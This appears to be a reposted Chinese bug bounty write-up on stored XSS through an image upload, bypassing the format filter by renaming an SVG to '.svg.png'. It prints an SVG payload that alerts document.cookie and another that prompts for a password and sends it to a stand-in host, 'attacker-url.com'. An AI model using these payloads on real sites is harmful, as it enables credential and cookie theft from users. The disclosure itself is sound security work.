如何利用图片上传功能实现存储型XSS

发布时间:2021-11-23 22:32:56 作者:柒染
来源:亿速云 阅读:1409

今天就跟大家聊聊有关如何利用图片上传功能实现存储型XSS,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

漏洞发现

1、登录进入目标WEB应用;
2、手工枚举测试;
3、观察WEB应用样式:

如何利用图片上传功能实现存储型XSS4、从中可以看到多个文本输入区域,我尝试了诸如sqli、xss、ssti等漏洞,都没问题。 但之后的Logo, Background Image 和 Advertisement Image图片上传点引起了我的注意,于是我决定构造一些特殊文件进行上传,看看有什么反应。 我随即构造了svg格式文件进行了上传:

如何利用图片上传功能实现存储型XSS5、 但上传后服务端却返回了以下错误响应:

如何利用图片上传功能实现存储型XSS6、那能否绕过格式限制呢?于是,我在文件名上做了手脚,把“Fileupload.svg”更改成“Fileupload.svg.png”再上传,竟然成功了:

如何利用图片上传功能实现存储型XSS7、之后,我点击上个界面中的“Next”,跳转到了另一个页面,在该页面中我可以访问到刚刚上传的图片,而且这些图片都是缩略图方式:

如何利用图片上传功能实现存储型XSS8、如上点击右键的“View Image”后,跳出了期待的svg xss:

如何利用图片上传功能实现存储型XSS

我构造的svg文件如下,其中包含了XSS Payload:

<?xml version=”1.0" standalone=”no”?>
<!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg">
<polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009901" stroke=”#004400"/>
<script type=”text/javascript”>
alert(document.cookie);
</script>
</svg>

改造一下,可在其中加入账号密码窃取Payload,最终如下:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>

        <script> 
                var passwd = prompt("Enter your password to continue");
                var xhr = new XMLHttpRequest();
                xhr.open("GET","https://attacker-url.com/log.php?password="+encodeURI(passwd));
                xhr.send();
        </script>

</svg>

9、再次把这些SVG文件上传:

如何利用图片上传功能实现存储型XSS10、点击右键“View Image”访问上述svg文件:

如何利用图片上传功能实现存储型XSS如何利用图片上传功能实现存储型XSS11、跳出密码输入的XSS Payload提示框,点击输入密码后,可见密码被窃取:

如何利用图片上传功能实现存储型XSS如何利用图片上传功能实现存储型XSS

漏洞奖励

漏洞最终获得了$1000的奖励。

如何利用图片上传功能实现存储型XSS如何利用图片上传功能实现存储型XSS

看完上述内容,你们对如何利用图片上传功能实现存储型XSS有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。

推荐阅读:
  1. DVWA篇之XSS存储型
  2. DVWA篇之XSS反射型

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

xss

上一篇:如何从零构建ipa-server实现ldap+kerberos网络用户验证

下一篇:c语言怎么实现含递归清场版扫雷游戏

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》